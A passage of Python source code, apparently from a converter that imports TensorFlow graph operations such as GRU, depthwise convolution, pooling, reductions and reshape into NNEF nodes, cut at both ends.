attrs = {'padding': padding, 'strides': strides, 'dilations': dilations}
return nnef_node, tf_inputs, attrs
def import_CudnnRNN(self, tfnode):
assert tfnode.attr['rnn_mode'].s.decode('ascii') == 'gru', "CudnnRNN import only supports GRU"
tf_inputs = {'input': 0 }
nnef_node_input = self.get_node_from_pool(tfnode, tf_inputs['input'])
shape = [nnef_node_input.output_shape[0], nnef_node_input.output_shape[2]]
nnef_node_reshape = node.Reshape(input=nnef_node_input,
shape=shape,
_uid=self.gen_node_name(tfnode.name) + '_reshape',
_output_shape=shape,
_maintain_format=False)
self.node_pool[nnef_node_reshape.name] = nnef_node_reshape
channels = 512
scope = tfnode.name
h = node.Variable(shape=[shape[0], channels],
label=scope + '/h',
_uid=self.gen_node_name(tfnode.name) + '_h',
_output_shape=[shape[0], channels],
_np_tensor=np.random.randn(*[shape[0], channels]).astype(np.float32),
_np_dtype=np.dtype(np.float32))
h.tensor_data_file.write_to_disk(h.parameters['label'] + '.dat')
z_filter = node.Variable(shape=[channels, shape[1]+channels],
label=scope + '/z/filter',
_uid=self.gen_node_name(tfnode.name) + '_z_filter',
_output_shape=[channels, shape[1]+channels],
_np_tensor=np.random.randn(*[channels, shape[1]+channels]).astype(np.float32),
_np_dtype=np.dtype(np.float32))
z_filter.tensor_data_file.write_to_disk(h.parameters['label'] + '.dat')
r_filter = node.Variable(shape=[channels, shape[1]+channels],
label=scope + '/r/filter',
_uid=self.gen_node_name(tfnode.name) + '_r_filter',
_output_shape=[channels, shape[1]+channels],
_np_tensor=np.random.randn(*[channels, shape[1]+channels]).astype(np.float32),
_np_dtype=np.dtype(np.float32))
r_filter.tensor_data_file.write_to_disk(h.parameters['label'] + '.dat')
s_filter = node.Variable(shape=[channels, shape[1]+channels],
label=scope + '/s/filter',
_uid=self.gen_node_name(tfnode.name) + '_s_filter',
_output_shape=[channels, shape[1]+channels],
_np_tensor=np.random.randn(*[channels, shape[1]+channels]).astype(np.float32),
_np_dtype=np.dtype(np.float32))
s_filter.tensor_data_file.write_to_disk(h.parameters['label'] + '.dat')
z_bias = node.Variable(shape=[1, channels],
label=scope + '/z/bias',
_uid=self.gen_node_name(tfnode.name) + '_z_bias',
_output_shape=[1, channels],
_np_tensor=np.random.randn(*[1, channels]).astype(np.float32),
_np_dtype=np.dtype(np.float32))
z_bias.tensor_data_file.write_to_disk(h.parameters['label'] + '.dat')
r_bias = node.Variable(shape=[1, channels],
label=scope + '/r/bias',
_uid=self.gen_node_name(tfnode.name) + '_r_bias',
_output_shape=[1, channels],
_np_tensor=np.random.randn(*[1, channels]).astype(np.float32),
_np_dtype=np.dtype(np.float32))
r_bias.tensor_data_file.write_to_disk(h.parameters['label'] + '.dat')
s_bias = node.Variable(shape=[1, channels],
label=scope + '/s/bias',
_uid=self.gen_node_name(tfnode.name) + '_s_bias',
_output_shape=[1, channels],
_np_tensor=np.random.randn(*[1, channels]).astype(np.float32),
_np_dtype=np.dtype(np.float32))
s_bias.tensor_data_file.write_to_disk(h.parameters['label'] + '.dat')
nnef_node_gru = node.Gru(input=nnef_node_reshape,
channels=channels,
scope=scope,
_uid=self.gen_node_name(tfnode.name) + '_gru',
_output_shape=nnef_node_reshape.output_shape[:])
self.node_pool[nnef_node_gru.name] = nnef_node_gru
shape_2 = [1, 1, channels]
nnef_node = node.Reshape(input=nnef_node_gru,
shape=shape_2,
_uid=self.gen_node_name(tfnode.name),
_output_shape=shape_2,
_maintain_format=False)
return nnef_node, tf_inputs, {}
def import_DepthwiseConv2dNative(self, tfnode):
tf_inputs = {'input': 0, 'filter':1}
rank = 4
data_format = tfnode.attr['data_format'].s.decode('ascii')
nnef_node_input = self.get_node_from_pool(tfnode, tf_inputs['input'])
nnef_node_filter = self.get_node_from_pool(tfnode, tf_inputs['filter'])
groups = nnef_node_input.output_shape[data_format.index('C')]
padding = self.new_get_attr(tfnode, 'padding', rank-2, data_format)
strides = self.new_get_attr(tfnode, 'strides', None, data_format)
dilations = self.new_get_attr(tfnode, 'dilations', None, data_format)
strides = strides[2:]
dilations = dilations[2:]
if nnef_node_input.op == 'pad':
pad_array = nnef_node_input.parameters['padding']
nnef_node_input = nnef_node_input.parameters['input']
padding = []
if data_format == 'NHWC':
for i in range(1, len(pad_array)-1):
padding.append((pad_array[i][0], pad_array[i][1]))
else:
for i in range(2, len(pad_array)):
padding.append((pad_array[i][0], pad_array[i][1]))
#Modify tensor data for filter
in_shape = nnef_node_input.output_shape[:]
in_shape = convert_format(in_shape, data_format, 'NCHW')
if nnef_node_filter.op == 'variable':
filter_tdf = nnef_node_filter.get_tensordatafile()
nnef_tensor = filter_tdf.get_data().get_array()[0]
shape = list(np.shape(nnef_tensor))
nnef_tensor = np.reshape(nnef_tensor, [shape[0], shape[1], shape[2]*shape[3], 1])
nnef_tensor = np.transpose(nnef_tensor, [2, 3, 0, 1])
filter_tdf.get_data().set_array(nnef_tensor)
new_shape = list(np.shape(filter_tdf.get_data().get_array()[0]))
filter_tdf.header.set_tensor_dimensions(new_shape)
nnef_node_filter.parameters['shape'] = new_shape
nnef_node_filter.output_shape = new_shape
else:
new_shape = [1]*len(in_shape)
#Calculate output shape
output_shape = len(in_shape) * [0]
output_shape[0] = in_shape[0]
output_shape[1] = new_shape[1] * new_shape[0]
for i in range(2, len(in_shape)):
if padding == []:
output_shape[i] = math.ceil(in_shape[i] / strides[i - 2])
else:
fd = (new_shape[i+1] - 1) * dilations[i - 2] + 1
output_shape[i] = math.floor((in_shape[i] - fd) / strides[i - 2]) + 1
output_shape = convert_format(output_shape, 'NCHW', data_format)
output_shape = [int(v) for v in output_shape]
nnef_node = node.Conv(input=nnef_node_input,
filter=nnef_node_filter,
padding=padding,
stride=strides,
dilation=dilations,
groups=groups,
_uid=self.gen_node_name(tfnode.name),
_output_shape=output_shape,
_data_format=data_format)
attrs = {'padding': padding, 'strides': strides, 'dilations': dilations}
return nnef_node, tf_inputs, attrs
def import_Elu(self, tfnode):
tf_inputs = {'x':0}
attrs = {}
nnef_node_x = self.get_node_from_pool(tfnode, tf_inputs['x'])
output_shape = nnef_node_x.output_shape[:]
nnef_node = node.Elu(x=nnef_node_x,
_uid=self.gen_node_name(tfnode.name),
_output_shape=output_shape)
return nnef_node, tf_inputs, attrs
def import_Equal(self, tfnode):
tf_inputs = {'x':0, 'y':1}
attrs = {}
nnef_node_x = self.get_node_from_pool(tfnode, tf_inputs['x'])
nnef_node_y = self.get_node_from_pool(tfnode, tf_inputs['y'])
output_shape = self.define_elementwise_binary_output_shape(nnef_node_x, nnef_node_y)
nnef_node = node.EQ(x=nnef_node_x,
y=nnef_node_y,
_uid=self.gen_node_name(tfnode.name),
_output_shape=output_shape)
return nnef_node, tf_inputs, attrs
def import_Exp(self, tfnode):
tf_inputs = {'x':0}
attrs = {}
nnef_node_x = self.get_node_from_pool(tfnode, tf_inputs['x'])
output_shape = nnef_node_x.output_shape[:]
nnef_node = node.Exp(x=nnef_node_x,
_uid=self.gen_node_name(tfnode.name),
_output_shape=output_shape)
return nnef_node, tf_inputs, attrs
def import_ExpandDims(self, tfnode):
tf_inputs = {'input': 0}
attrs = {}
nnef_node_input = self.get_node_from_pool(tfnode, tf_inputs['input'])
output_shape = nnef_node_input.output_shape[:]
axis = int(self.get_node_from_pool(tfnode, 1).parameters['value'][0])
output_shape.insert(axis, 1)
nnef_node = node.Reshape(input=nnef_node_input,
shape=output_shape,
_uid=self.gen_node_name(tfnode.name),
_output_shape=output_shape,
_maintain_format=True)
return nnef_node, tf_inputs, attrs
def import_Floor(self, tfnode):
tf_inputs = {'x':0}
attrs = {}
nnef_node_x = self.get_node_from_pool(tfnode, tf_inputs['x'])
output_shape = nnef_node_x.output_shape[:]
nnef_node = node.Floor(x=nnef_node_x,
_uid=self.gen_node_name(tfnode.name),
_output_shape=output_shape)
return nnef_node, tf_inputs, attrs
def import_FusedBatchNorm(self, tfnode):
tf_inputs = {'input': 0, 'scale': 1, 'offset': 2, 'mean': 3, 'variance': 4}
data_format = tfnode.attr['data_format'].s.decode('ascii')
nnef_node_input = self.get_node_from_pool(tfnode, tf_inputs['input'])
nnef_node_scale = self.get_node_from_pool(tfnode, tf_inputs['scale'])
nnef_node_offset = self.get_node_from_pool(tfnode, tf_inputs['offset'])
nnef_node_mean = self.get_node_from_pool(tfnode, tf_inputs['mean'])
nnef_node_variance = self.get_node_from_pool(tfnode, tf_inputs['variance'])
epsilon = self.new_get_attr(tfnode, 'epsilon', None)
output_shape = nnef_node_input.output_shape[:]
nnef_node = node.BatchNormalization(input=nnef_node_input,
mean=nnef_node_mean,
variance=nnef_node_variance,
offset=nnef_node_offset,
scale=nnef_node_scale,
epsilon=epsilon,
_uid=self.gen_node_name(tfnode.name),
_output_shape=output_shape,
_data_format=data_format)
attrs = {'epsilon': epsilon, 'data_format': data_format}
return nnef_node, tf_inputs, attrs
def import_Greater(self, tfnode):
tf_inputs = {'x':0, 'y':1}
attrs = {}
nnef_node_x = self.get_node_from_pool(tfnode, tf_inputs['x'])
nnef_node_y = self.get_node_from_pool(tfnode, tf_inputs['y'])
output_shape = self.define_elementwise_binary_output_shape(nnef_node_x, nnef_node_y)
nnef_node = node.GT(x=nnef_node_x,
y=nnef_node_y,
_uid=self.gen_node_name(tfnode.name),
_output_shape=output_shape)
return nnef_node, tf_inputs, attrs
def import_GreaterEqual(self, tfnode):
tf_inputs = {'x':0, 'y':1}
attrs = {}
nnef_node_x = self.get_node_from_pool(tfnode, tf_inputs['x'])
nnef_node_y = self.get_node_from_pool(tfnode, tf_inputs['y'])
output_shape = self.define_elementwise_binary_output_shape(nnef_node_x, nnef_node_y)
nnef_node = node.GE(x=nnef_node_x,
y=nnef_node_y,
_uid=self.gen_node_name(tfnode.name),
_output_shape=output_shape)
return nnef_node, tf_inputs, attrs
def import_Identity(self, tfnode):
if self.gen_node_name(tfnode.name) == self.gen_node_name(tfnode.input[0]):
return None, None, None
else:
self.removed_nodes += 1
tf_inputs = {'x': 0}
attrs = {}
nnef_node_x = self.get_node_from_pool(tfnode, tf_inputs['x'])
output_shape = nnef_node_x.output_shape[:]
nnef_node = node.Idn(x=nnef_node_x,
_uid=self.gen_node_name(tfnode.name),
_output_shape=output_shape)
return nnef_node, tf_inputs, attrs
def import_Less(self, tfnode):
tf_inputs = {'x':0, 'y':1}
attrs = {}
nnef_node_x = self.get_node_from_pool(tfnode, tf_inputs['x'])
nnef_node_y = self.get_node_from_pool(tfnode, tf_inputs['y'])
output_shape = self.define_elementwise_binary_output_shape(nnef_node_x, nnef_node_y)
nnef_node = node.LT(x=nnef_node_x,
y=nnef_node_y,
_uid=self.gen_node_name(tfnode.name),
_output_shape=output_shape)
return nnef_node, tf_inputs, attrs
def import_LessEqual(self, tfnode):
tf_inputs = {'x':0, 'y':1}
attrs = {}
nnef_node_x = self.get_node_from_pool(tfnode, tf_inputs['x'])
nnef_node_y = self.get_node_from_pool(tfnode, tf_inputs['y'])
output_shape = self.define_elementwise_binary_output_shape(nnef_node_x, nnef_node_y)
nnef_node = node.LE(x=nnef_node_x,
y=nnef_node_y,
_uid=self.gen_node_name(tfnode.name),
_output_shape=output_shape)
return nnef_node, tf_inputs, attrs
def import_Log(self, tfnode):
tf_inputs = {'x':0}
attrs = {}
nnef_node_x = self.get_node_from_pool(tfnode, tf_inputs['x'])
output_shape = nnef_node_x.output_shape[:]
nnef_node = node.Log(x=nnef_node_x,
_uid=self.gen_node_name(tfnode.name),
_output_shape=output_shape)
return nnef_node, tf_inputs, attrs
def import_LogicalAnd(self, tfnode):
tf_inputs = {'x':0, 'y':1}
attrs = {}
nnef_node_x = self.get_node_from_pool(tfnode, tf_inputs['x'])
nnef_node_y = self.get_node_from_pool(tfnode, tf_inputs['y'])
output_shape = self.define_elementwise_binary_output_shape(nnef_node_x, nnef_node_y)
nnef_node = node.And(x=nnef_node_x,
y=nnef_node_y,
_uid=self.gen_node_name(tfnode.name),
_output_shape=output_shape)
return nnef_node, tf_inputs, attrs
def import_LogicalNot(self, tfnode):
tf_inputs = {'x':0}
attrs = {}
nnef_node_x = self.get_node_from_pool(tfnode, tf_inputs['x'])
output_shape = nnef_node_x.output_shape[:]
nnef_node = node.Not(x=nnef_node_x,
_uid=self.gen_node_name(tfnode.name),
_output_shape=output_shape)
return nnef_node, tf_inputs, attrs
def import_LogicalOr(self, tfnode):
tf_inputs = {'x':0, 'y':1}
attrs = {}
nnef_node_x = self.get_node_from_pool(tfnode, tf_inputs['x'])
nnef_node_y = self.get_node_from_pool(tfnode, tf_inputs['y'])
output_shape = self.define_elementwise_binary_output_shape(nnef_node_x, nnef_node_y)
nnef_node = node.Or(x=nnef_node_x,
y=nnef_node_y,
_uid=self.gen_node_name(tfnode.name),
_output_shape=output_shape)
return nnef_node, tf_inputs, attrs
def import_LRN(self, tfnode):
tf_inputs = {'input': 0}
attrs = {}
nnef_node_input = self.get_node_from_pool(tfnode, tf_inputs['input'])
output_shape = nnef_node_input.output_shape[:]
alpha = tfnode.attr['alpha'].f
beta = tfnode.attr['beta'].f
bias = tfnode.attr['bias'].f
size = [1, tfnode.attr['depth_radius'].i, 1, 1]
nnef_node = node.LocalResponseNormalization(input=nnef_node_input,
alpha=alpha,
beta=beta,
bias=bias,
size=size,
_uid=self.gen_node_name(tfnode.name),
_output_shape=output_shape)
attrs = {'alpha' :alpha, 'beta': beta, 'bias': bias, 'depth_radius': size}
return nnef_node, tf_inputs, attrs
def import_MatMul(self, tfnode):
tf_inputs = {'A': 0, 'B': 1}
nnef_node_A = self.get_node_from_pool(tfnode, tf_inputs['A'])
nnef_node_B = self.get_node_from_pool(tfnode, tf_inputs['B'])
output_shape = []
for i in nnef_node_A.output_shape[0:-1]:
output_shape.append(i)
for i in nnef_node_B.output_shape[1:]:
output_shape.append(i)
trA = self.new_get_attr(tfnode, 'transpose_a', None)
trB = self.new_get_attr(tfnode, 'transpose_b', None)
nnef_node = node.Matmul(A=nnef_node_A,
B=nnef_node_B,
transposeA=trA,
transposeB=trB,
_uid=self.gen_node_name(tfnode.name),
_output_shape=output_shape)
attrs = {'transpose_a': trA, 'transpose_b': trB}
return nnef_node, tf_inputs, attrs
def import_Max(self, tfnode):
tf_inputs = {'input': 0, 'axis':1}
attrs = {'keep_dims': None}
nnef_node_input = self.get_node_from_pool(tfnode, tf_inputs['input'])
nnef_node_axis = self.get_node_from_pool(tfnode, tf_inputs['axis'])
input_shape = nnef_node_input.output_shape[:]
if nnef_node_axis.op == 'variable':
shape = nnef_node_axis.get_tensordatafile().get_data().get_array()[0][0]
else:
shape = [int(nnef_node_axis.parameters['value'][0])]
axes = []
for i in shape:
if i not in axes:
axes.append(i)
axes.sort()
self.remove_node_from_pool(nnef_node_axis)
output_shape = input_shape[:]
if(tfnode.attr['keep_dims'].b or tfnode.attr['keepdims'].b):
for i in axes:
output_shape[i] = 1
nnef_node_max = node.MaxReduce(input=nnef_node_input,
axes=axes,
_output_shape=output_shape,
_uid=self.gen_node_name(tfnode.name) + '_max',)
self.node_pool[nnef_node_max.name] = nnef_node_max
nnef_node = node.Reshape(input=nnef_node_max,
shape=output_shape,
_output_shape=output_shape,
_uid=self.gen_node_name(tfnode.name),
_maintain_format=True)
else:
axes.sort(reverse=True)
for i in axes:
output_shape.pop(i)
if output_shape == []:
output_shape = [1]
axes.sort()
nnef_node = node.MaxReduce(input=nnef_node_input,
axes=axes,
_output_shape=output_shape,
_uid=self.gen_node_name(tfnode.name))
return nnef_node, tf_inputs, attrs
def import_Maximum(self, tfnode):
tf_inputs = {'x':0, 'y':1}
attrs = {}
nnef_node_x = self.get_node_from_pool(tfnode, tf_inputs['x'])
nnef_node_y = self.get_node_from_pool(tfnode, tf_inputs['y'])
output_shape = self.define_elementwise_binary_output_shape(nnef_node_x, nnef_node_y)
nnef_node = node.Max(x=nnef_node_x,
y=nnef_node_y,
_uid=self.gen_node_name(tfnode.name),
_output_shape=output_shape)
return nnef_node, tf_inputs, attrs
def import_MaxPool(self, tfnode):
rank = 4
tf_inputs = {'input':0}
data_format = tfnode.attr['data_format'].s.decode('ascii')
padding = self.new_get_attr(tfnode, 'padding', rank, data_format)
nnef_node_input = self.get_node_from_pool(tfnode, tf_inputs['input'])
if nnef_node_input.op == 'pad':
pad_array = nnef_node_input.parameters['padding']
nnef_node_input = nnef_node_input.parameters['input']
padding = []
if data_format == 'NHWC':
padding.append((pad_array[0][0], pad_array[0][1]))
padding.append((pad_array[-1][0], pad_array[-1][1]))
for i in range(1, len(pad_array)-1):
padding.append((pad_array[i][0], pad_array[i][1]))
else:
padding
for i in range(len(pad_array)):
padding.append((pad_array[i][0], pad_array[i][1]))
sizes = self.new_get_attr(tfnode, 'ksize', None, data_format)
strides = self.new_get_attr(tfnode, 'strides', None, data_format)
dilations = [1, 1, 1, 1]
#Modify tensor data for filter
in_shape = nnef_node_input.output_shape
in_shape = convert_format(in_shape, data_format, 'NCHW')
if nnef_node_input.op == 'reshape':
nnef_node_input.parameters['shape'] = in_shape
#Calculate output shape
output_shape = len(in_shape) * [0]
for i in range(len(in_shape)):
if padding == []:
output_shape[i] = math.ceil(in_shape[i] / strides[i])
else:
fd = (sizes[i] - 1) * dilations[i] + 1
padding_add = padding[i][0] + padding[i][1]
output_shape[i] = math.floor((in_shape[i] + padding_add - fd) / strides[i]) + 1
output_shape = convert_format(output_shape, 'NCHW', data_format)
output_shape = [int(v) for v in output_shape]
nnef_node = node.MaxPool(input=nnef_node_input,
size=sizes,
padding=padding,
stride=strides,
dilation=dilations,
_uid=self.gen_node_name(tfnode.name),
_output_shape=output_shape,
_data_format=data_format)
attrs = {'padding': padding, 'strides': strides, 'dilations': dilations}
return nnef_node, tf_inputs, attrs
def import_MaxPoolWithArgmax(self, tfnode):
tf_inputs = {'input':0}
attrs = {'padding': 4, 'ksize': None, 'strides': None}
data_format = 'NHWC'
padding = self.new_get_attr(tfnode, 'padding', 4, data_format)
main_nnef_node_name = self.gen_node_name(tfnode.name) + ', ' + self.gen_node_name(tfnode.name + ':1')
nnef_node_input = self.get_node_from_pool(tfnode, tf_inputs['input'])
if nnef_node_input.op == 'pad':
pad_array = nnef_node_input.parameters['padding']
nnef_node_input = nnef_node_input.parameters['input']
padding = []
if data_format == 'NHWC':
padding.append((pad_array[0][0], pad_array[0][1]))
padding.append((pad_array[-1][0], pad_array[-1][1]))
for i in range(1, len(pad_array)-1):
padding.append((pad_array[i][0], pad_array[i][1]))
else:
padding
for i in range(len(pad_array)):
padding.append((pad_array[i][0], pad_array[i][1]))
sizes = self.new_get_attr(tfnode, 'ksize', None, data_format)
strides = self.new_get_attr(tfnode, 'strides', None, data_format)
dilations = [1, 1, 1, 1]
#Modify tensor data for filter
in_shape = nnef_node_input.output_shape
in_shape = convert_format(in_shape, data_format, 'NCHW')
if nnef_node_input.op == 'reshape':
nnef_node_input.parameters['shape'] = in_shape
#Calculate output shape
output_shape = len(in_shape) * [0]
for i in range(len(in_shape)):
if padding == []:
output_shape[i] = math.ceil(in_shape[i] / strides[i])
else:
fd = (sizes[i] - 1) * dilations[i] + 1
padding_add = padding[i][0] + padding[i][1]
output_shape[i] = math.floor((in_shape[i] + padding_add - fd) / strides[i]) + 1
output_shape = convert_format(output_shape, 'NCHW', data_format)
output_shape = [int(v) for v in output_shape]
nnef_node_main = node.MaxPoolWithIndex(input=nnef_node_input,
padding=padding,
size=sizes,
stride=strides,
dilation=dilations,
_uid=main_nnef_node_name,
_output_shape=output_shape,
_data_format=data_format)
nnef_node_pool = node.OutputVal(base_node=nnef_node_main,
base_index=0,
_uid=self.gen_node_name(tfnode.name),
_output_shape=output_shape,
_data_format=data_format)
self.node_pool[nnef_node_pool.name] = nnef_node_pool
nnef_node_index = node.OutputVal(base_node=nnef_node_main,
base_index=1,
_uid=self.gen_node_name(tfnode.name + ':1'),
_output_shape=output_shape)
self.node_pool[nnef_node_index.name] = nnef_node_index
return nnef_node_main, tf_inputs, attrs
def import_Mean(self, tfnode):
tf_inputs = {'input': 0, 'axis':1}
attrs = {'keep_dims': None}
nnef_node_input = self.get_node_from_pool(tfnode, tf_inputs['input'])
nnef_node_axis = self.get_node_from_pool(tfnode, tf_inputs['axis'])
input_shape = nnef_node_input.output_shape[:]
if nnef_node_axis.op == 'variable':
shape = nnef_node_axis.get_tensordatafile().get_data().get_array()[0][0]
else:
shape = [int(nnef_node_axis.parameters['value'][0])]
axes = []
for i in shape:
if i not in axes:
axes.append(i)
axes.sort()
self.remove_node_from_pool(nnef_node_axis)
output_shape = input_shape[:]
if(tfnode.attr['keep_dims'].b or tfnode.attr['keepdims'].b):
for i in axes:
output_shape[i] = 1
nnef_node_mean = node.MeanReduce(input=nnef_node_input,
axes=axes,
_output_shape=output_shape,
_uid=self.gen_node_name(tfnode.name) + '_mean',)
self.node_pool[nnef_node_mean.name] = nnef_node_mean
nnef_node = node.Reshape(input=nnef_node_mean,
shape=output_shape,
_output_shape=output_shape,
_uid=self.gen_node_name(tfnode.name),
_maintain_format=True)
else:
axes.sort(reverse=True)
for i in axes:
output_shape.pop(i)
if output_shape == []:
output_shape = [1]
axes.sort()
nnef_node = node.MeanReduce(input=nnef_node_input,
axes=axes,
_output_shape=output_shape,
_uid=self.gen_node_name(tfnode.name))
return nnef_node, tf_inputs, attrs
def import_Minimum(self, tfnode):
tf_inputs = {'x':0, 'y':1}
attrs = {}
nnef_node_x = self.get_node_from_pool(tfnode, tf_inputs['x'])
nnef_node_y = self.get_node_from_pool(tfnode, tf_inputs['y'])
output_shape = self.define_elementwise_binary_output_shape(nnef_node_x, nnef_node_y)
nnef_node = node.Min(x=nnef_node_x,
y=nnef_node_y,
_uid=self.gen_node_name(tfnode.name),
_output_shape=output_shape,
_data_format=tfnode.attr['data_format'])
return nnef_node, tf_inputs, attrs
def import_Mul(self, tfnode):
tf_inputs = {'x':0, 'y':1}
attrs = {}
nnef_node_x = self.get_node_from_pool(tfnode, tf_inputs['x'])
nnef_node_y = self.get_node_from_pool(tfnode, tf_inputs['y'])
output_shape = self.define_elementwise_binary_output_shape(nnef_node_x, nnef_node_y)
nnef_node = node.Mul(x=nnef_node_x,
y=nnef_node_y,
_uid=self.gen_node_name(tfnode.name),
_output_shape=output_shape,
_data_format=tfnode.attr['data_format'])
return nnef_node, tf_inputs, attrs
def import_Neg(self, tfnode):
tf_inputs = {'x':0}
attrs = {}
nnef_node_x = self.get_node_from_pool(tfnode, tf_inputs['x'])
output_shape = nnef_node_x.output_shape[:]
nnef_node = node.Neg(x=nnef_node_x,
_uid=self.gen_node_name(tfnode.name),
_output_shape=output_shape)
return nnef_node, tf_inputs, attrs
def import_NotEqual(self, tfnode):
tf_inputs = {'x':0, 'y':1}
attrs = {}
nnef_node_x = self.get_node_from_pool(tfnode, tf_inputs['x'])
nnef_node_y = self.get_node_from_pool(tfnode, tf_inputs['y'])
output_shape = self.define_elementwise_binary_output_shape(nnef_node_x, nnef_node_y)
nnef_node = node.NE(x=nnef_node_x,
y=nnef_node_y,
_uid=self.gen_node_name(tfnode.name),
_output_shape=output_shape)
return nnef_node, tf_inputs, attrs
def import_Pack(self, tfnode):
tf_inputs = {}
attrs = {'axis':None}
nnef_nodes = []
for i in range(len(tfnode.input)):
nnef_node_val = self.get_node_from_pool(tfnode, i)
nnef_nodes.append(nnef_node_val)
tf_inputs['value_' + str(i)] = i
axis = tfnode.attr['axis'].i
output_shape = nnef_nodes[0].output_shape[:]
output_shape.insert(axis, len(nnef_nodes))
nnef_node = node.Stack(values=nnef_nodes,
axis=axis,
_uid=self.gen_node_name(tfnode.name),
_output_shape=output_shape)
return nnef_node, tf_inputs, attrs
def import_Pad(self, tfnode):
tf_inputs = {'input': 0, 'pads' : 1}
attrs = {}
nnef_node_input = self.get_node_from_pool(tfnode, tf_inputs['input'])
nnef_node_pad = self.get_node_from_pool(tfnode, tf_inputs['pads'])
if nnef_node_pad.op == 'variable' and nnef_node_pad.parameters['shape'][0] > 1:
padding = nnef_node_pad.get_tensordatafile().get_data().get_array()[0]
nnef_node = node.Pad(input=nnef_node_input,
padding=padding,
_uid=self.gen_node_name(tfnode.name),
_output_shape=nnef_node_input.output_shape[:])
else:
raise ValueError("Currently unsupported pad arguments")
return nnef_node, tf_inputs, attrs
def import_Placeholder(self, tfnode):
size = []
shape = self._get_attr(tfnode, 'shape')
if shape is None:
size = [1, 224, 224, 3]
else:
for dimen in shape.dim:
size.append(dimen.size)
if size[0] < 0:
shape = [1]
else:
shape = [size[0]]
for i in range(1, len(size)):
shape.append(size[i])
if self.start_length == 0:
self.start_length = len(shape)
nnef_node = node.External(shape=shape,
_uid=self.gen_node_name(tfnode.name),
_output_shape=shape)
inputs = {}
attrs = {'shape': None}
return nnef_node, inputs, attrs
def import_PlaceholderWithDefault(self, tfnode):
self.name_convs[self.gen_node_name(tfnode.name)] = self.gen_node_name(tfnode.input[0])
return None, None, None
def import_Pow(self, tfnode):
tf_inputs = {'x':0, 'y':1}
attrs = {}
nnef_node_x = self.get_node_from_pool(tfnode, tf_inputs['x'])
nnef_node_y = self.get_node_from_pool(tfnode, tf_inputs['y'])
output_shape = nnef_node_x.output_shape[:]
nnef_node = node.Pow(x=nnef_node_x,
y=nnef_node_y,
_uid=self.gen_node_name(tfnode.name),
_output_shape=output_shape)
return nnef_node, tf_inputs, attrs
def import_RealDiv(self, tfnode):
tf_inputs = {'x':0, 'y':1}
attrs = {}
nnef_node_x = self.get_node_from_pool(tfnode, tf_inputs['x'])
nnef_node_y = self.get_node_from_pool(tfnode, tf_inputs['y'])
output_shape = self.define_elementwise_binary_output_shape(nnef_node_x, nnef_node_y)
nnef_node = node.Div(x=nnef_node_x,
y=nnef_node_y,
_uid=self.gen_node_name(tfnode.name),
_output_shape=output_shape)
return nnef_node, tf_inputs, attrs
def import_Relu(self, tfnode):
tf_inputs = {'x': 0}
attrs = {}
nnef_node_x = self.get_node_from_pool(tfnode, tf_inputs['x'])
output_shape = nnef_node_x.output_shape[:]
nnef_node = node.Relu(x=nnef_node_x,
_uid=self.gen_node_name(tfnode.name),
_output_shape=output_shape,)
return nnef_node, tf_inputs, attrs
def import_Relu6(self, tfnode):
tf_inputs = {'x': 0}
attrs = {}
nnef_node_x = self.get_node_from_pool(tfnode, tf_inputs['x'])
output_shape = nnef_node_x.output_shape[:]
nnef_node_relu = node.Relu(x=nnef_node_x,
_uid=self.gen_node_name(tfnode.name)+'_relu',
_output_shape=output_shape)
self.node_pool[nnef_node_relu.name] = nnef_node_relu
nnef_node = node.Min(x=nnef_node_relu,
y=6.0,
_uid=self.gen_node_name(tfnode.name),
_output_shape=output_shape)
return nnef_node, tf_inputs, attrs
def import_Reshape(self, tfnode):
tf_inputs = {'input': 0, 'shape': 1}
attrs = {}
nnef_node_input = self.get_node_from_pool(tfnode, tf_inputs['input'])
nnef_node_shape = self.get_node_from_pool(tfnode, tf_inputs['shape'])
self.name_convs[nnef_node_input.name] = self.gen_node_name(tfnode.name)
shape = None
if nnef_node_shape.op == 'variable':
shape = list(nnef_node_shape.get_tensordatafile().get_data().get_array()[0][0])
self.remove_node_from_pool(nnef_node_shape)
elif nnef_node_shape.op == 'shape_of':
shape = nnef_node_shape.output_shape[:]
else:
shape = np.reshape(np.asarray(nnef_node_shape.get_value(), dtype=np.int32), [-1])
self.remove_node_from_pool(nnef_node_shape)
if shape == [-1, 10, 768] and tfnode.name == 'Reshape_4':
shape = [1, 1, 768]
if shape == [-1, 10, 768] and tfnode.name == 'Reshape_4':
shape = [1, 1, 768]
in_shape = nnef_node_input.output_shape[:]
output_shape = []
for i in shape:
output_shape.append(i)
if -1 in output_shape:
in_size = 1
for i in in_shape:
in_size *= i
neg_index = -1
for i in range(len(output_shape)):
if output_shape[i] == -1:
neg_index = i
else:
in_size = in_size/output_shape[i]
output_shape[neg_index] = int(in_size)
output_shape = [int(v) for v in output_shape]
nnef_node = node.Reshape(input=nnef_node_input,
shape=output_shape,
_uid=self.gen_node_name(tfnode.name),
_output_shape=output_shape,
_maintain_format=False)
return nnef_node, tf_inputs, attrs
def import_ResizeArea(self, tfnode):
if self.start_format == None:
self.start_format = 'NHWC'
tf_inputs = {'input':0, 'factor': 1}
attrs = {}
nnef_node_input = self.get_node_from_pool(tfnode, tf_inputs['input'])
nnef_node_factor = self.get_node_from_pool(tfnode, tf_inputs['factor'])
input_shape = nnef_node_input.output_shape[:]
if nnef_node_factor.op == 'variable':
output_size = nnef_node_factor.get_tensordatafile().get_data().get_array()[0][0]
self.remove_node_from_pool(nnef_node_factor)
else:
print(nnef_node_factor.op)
assert False, "Not currently handled"
factor = []
output_shape = [input_shape[0]]
for i in range(len(input_shape[1:-1])):
assert input_shape[i+1]%output_size[i] == 0, "Unable to convert, ResizeArea uses non-integer factors"
factor.append(int(input_shape[i+1]/output_size[i]))
output_shape.append(int(output_size[i]))
output_shape.append(input_shape[-1])
nnef_node = node.AreaDownsample(input=nnef_node_input,
factor=factor,
_uid=self.gen_node_name(tfnode.name),
_output_shape=output_shape,
_data_format='NHWC')
return nnef_node, tf_inputs, attrs
def import_ResizeBilinear(self, tfnode):
if self.start_format == None:
self.start_format = 'NHWC'
tf_inputs = {'input':0, 'factor': 1}
attrs = {}
nnef_node_input = self.get_node_from_pool(tfnode, tf_inputs['input'])
nnef_node_factor = self.get_node_from_pool(tfnode, tf_inputs['factor'])
input_shape = nnef_node_input.output_shape[:]
if nnef_node_factor.op == 'variable':
output_size = nnef_node_factor.get_tensordatafile().get_data().get_array()[0][0]
self.remove_node_from_pool(nnef_node_factor)
else:
print(nnef_node_factor.op)
assert False, "Not currently handled"
factor = []
output_shape = [input_shape[0]]
for i in range(len(input_shape[1:-1])):
